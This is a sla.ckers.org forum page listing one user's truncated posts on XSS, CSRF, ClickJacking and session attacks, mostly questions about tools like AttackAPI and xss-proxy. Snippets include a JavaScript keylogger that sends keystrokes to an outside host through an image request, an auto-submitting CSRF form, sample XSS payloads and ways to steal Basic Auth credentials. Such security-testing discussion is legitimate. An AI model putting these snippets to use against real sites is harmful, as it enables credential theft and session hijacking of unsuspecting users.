Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 

Pages: 1 2 Next
Current Page: 1 of 2
Results 1 - 30 of 33
5 years ago
jamuse
If you find any bugs, or have a feature request, you can ping me or post to the AttackAPI mailing list, and I should be able to sort it out for you.
Forum: XSS Info
5 years ago
jamuse
You can force IE to show the real error message and not the "friendly" one by making sure your payload is longer than 512 bytes.
Forum: XSS Info
5 years ago
jamuse
The latest version of AttackAPI has the AttackAPI.dom.scanFiles() function which can be used to scan a machine for installed software. It uses the res protocol.
Forum: XSS Info
5 years ago
jamuse
I've seen the frame-breaking code suggestion, but if you can implement random non-predictable URLs (or even just a parameter) on the server, why would you want to rely on a JavaScript solution? Unless I'm missing something, an attacker can't frame a non-predictable URL, thus she can't create a link to trick the victim into clicking. Take my original example, it seems that adding a random parameter
Forum: CSRF and Session Info
5 years ago
jamuse
If the app isn't vulnerable to any XSS flaws, then under what circumstances would a non-predictable URL **not** provide ClickJacking protection?
Forum: CSRF and Session Info
5 years ago
jamuse
Would adding a per-page nonce in the URL protect against ClickJacking attacks? For example, say the only static URL for the app was hxxp://bank.com which returned a login screen. Every URL after that used a POST request with a per-page nonce in the URL and a separate per-request nonce in the POST data. The app would terminate the session any time either of these nonces is submitted incorrectly an
Forum: CSRF and Session Info
6 years ago
jamuse
Can you use the Location header to redirect the victim to a site under your control and launch the javascript from there?
Forum: XSS Info
6 years ago
jamuse
@Gareth I had an (incorrect) regex that searched for the 'http' string in the url2xss parameter, otherwise I redirected. That should have stopped your second example. Were you able to get an alert box with your PoC: hxxp://zur.homelinux.com/xssForwarder.php?url2xss=javascript:alert(1)&doit=done&intl=1&tt=urltext&trtext=this+is+a+test&lp=en_it&btnTrTxt=Translate That inc
Forum: XSS Info
6 years ago
jamuse
Hehe, I wrote my own because I wanted the auto-submit feature, oh well. Gareth: I tried your PoC in FF2 but did not see an alert box, which browsers should it work on? BTW I added ENT_QUOTES to the script, so it should not work anymore.
Forum: XSS Info
6 years ago
jamuse
First verify that you can get an alert box. Check what payload your scanner used, as you may find that a simple "><script>alert(123)</script> may not be sufficient in some cases. Once you've verified its existence, check whether there are any limitations in payload size or allowed characters. There are a number of techniques to bypass both of these limitations if you have enough s
Forum: XSS Info
6 years ago
jamuse
You can try my POST to GET forwarder at: http://zur.homelinux.com/xssForwarder.php
Forum: XSS Info
6 years ago
jamuse
Thanks, I tried emailing PDP, PMing, and even posted to the AttackAPI mailing list, but no dice. I did make some progress though, perhaps this may shed a little light on the problem. After I zombiefy a client, that client sends requests to /undefined, which results in a 404 (the full request is shown below) (hxxp://localhost/undefined?action=pull&callback=AttackAPI.dom.spawnChannel.channe
Forum: XSS Info
6 years ago
jamuse
Nah, that's no good either. For example, let's say you have an iframe whose source is pointed to an external site which redirects the user back to your site. Think of one of the many XSS / CSRF forwarder scripts out there. A malicious user includes an iframe sending the victim to the external site, the external site then forces the victim's browser to send a CSRF request to your site, which would include
Forum: XSS Info
6 years ago
jamuse
What about using an iframe whose height and width are set to zero for CSRF attacks?
Forum: XSS Info
6 years ago
jamuse
I'd like to use AttackAPI to demonstrate similar functionality to xss-proxy. After reading Chapter 7 of the XSS attacks book and http://www.gnucitizen.org/blog/persistent-bi-directional-communication-channels, I still have the following questions: 1. When exploiting an XSS vuln, what do I need to include in the payload to zombiefy the victim browser? 2. I tried the controlling zom
Forum: XSS Info
6 years ago
jamuse
It was fixed in the latest browsers, but there seems to be a workaround that Amit Klein came up with. By adding some white space before the method, you can bypass the TRACE restriction in IE. For more details see: http://jeremiahgrossman.blogspot.com/2007/04/xst-lives-bypassing-httponly.html
Forum: CSRF and Session Info
6 years ago
jamuse
I'm setting up a PoC CSRF demo and want to send the entire HTML results to a third party site. I'm using the following code to send the request: <HTML> <BODY> <form method="GET" id="evil" name="evil" action="http:///showinfo.aspx"> </form> <script> document.evil.submit(); </script> </BODY> &
Forum: CSRF and Session Info
7 years ago
jamuse
I didn't think it was possible until I saw that xssshell claims that it can steal basic auth credentials. Anybody have any experience with xssshell? What mechanism does it use to get access to the basic auth header?
Forum: XSS Info
7 years ago
jamuse
I am testing an app that has a stored XSS vuln. The app uses both a SessionID and Basic Authentication. How can I use the stored XSS vuln to steal the Basic Authentication? The site does not accept the TRACE method.
Forum: XSS Info
7 years ago
jamuse
I'm trying to figure out how character permutations work in relation to XSS attacks. Say I have the following vulnerable PHP script: <HTML> <HEAD> </HEAD> <BODY> <? $xss = $_GET["xss"]; print "$xss"; ?> </BODY> </HTML> and want to use &#60 to represent the < character to bypass a hypothetical filter th
Forum: XSS Info
7 years ago
jamuse
If I understood the question correctly, then have you tried sending some malicious code in the given variables and adding print or echo statements before those variables are used for anything to see what they're set to?
Forum: XSS Info
7 years ago
jamuse
In my attempt to learn javascript, I started writing a keylogger. So far I have the following: function logKeys(e) { var keybfr = ""; var isNetscape = (navigator.appName.indexOf("Netscape") != -1); var keybfr = (isNetscape) ? String.fromCharCode(e.which) : String.fromCharCode(e.keyCode); var img = new Image(); img.src = "http://mysite.com/kl_&q
Forum: XSS Info
7 years ago
jamuse
Spiders
Are there any freely available spiders that can compete with the likes of Appscan / Webinspect in terms of finding and parsing non-standard links? I know Burp has some JavaScript support, but it never seems to find the amount of web pages that the proprietary spiders find.
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
jamuse
Anton, the new version hasn't hit SourceForge yet. Is there another homepage for the project? So the admin browser will be able to easily access files on the victim's computer, that's pretty cool.
Forum: XSS Info
7 years ago
jamuse
Thanks! One more question, is there a reason the iframe in the victim's browser is so small?
Forum: XSS Info
7 years ago
jamuse
Which browser did the code work for you on? I tested on FF2.0, Opera9 and IE6 and have not gotten the text to change.
Forum: XSS Info
7 years ago
jamuse
I'm looking for a little guidance in getting xss-proxy working. I'm trying to XSS myself. I set $PORT to 81 and kept $code_server as http://localhost. I created an HTML called xss.html with <script src="http://localhost:81/xss2.js"></script> When I access xss.html (http://localhost:80/xss.html) I can see the request in the clients section of the xss-proxy admin console, bu
Forum: XSS Info
7 years ago
jamuse
Thanks for your help, I'm still missing something though. I put the following in the payload: <script> setTimeout('doIt()',1000); function doIt() { input='is'; output='was'; document.body.innerHTML = document.body.innerHTML.replace(input,output); } </script> Can you see what's missing?
Forum: XSS Info
7 years ago
jamuse
Getting back to hasse's suggestion, I want to replace just the word 'is' with 'was' using the same HTML example as above (i.e. output: "this was a test"). I tried sending: http://localhost/id.php?xss=%3Cscript%3EsetTimeout('doIt()',1000);function%20doIt(){input%20=%20'is';%20output%20=%20'was';document.body.innerHTML.replace(input,output);}%3C/script%3E but was unsuccessful. What am I
Forum: XSS Info
7 years ago
jamuse
Yup, that did it, thanks.
Forum: XSS Info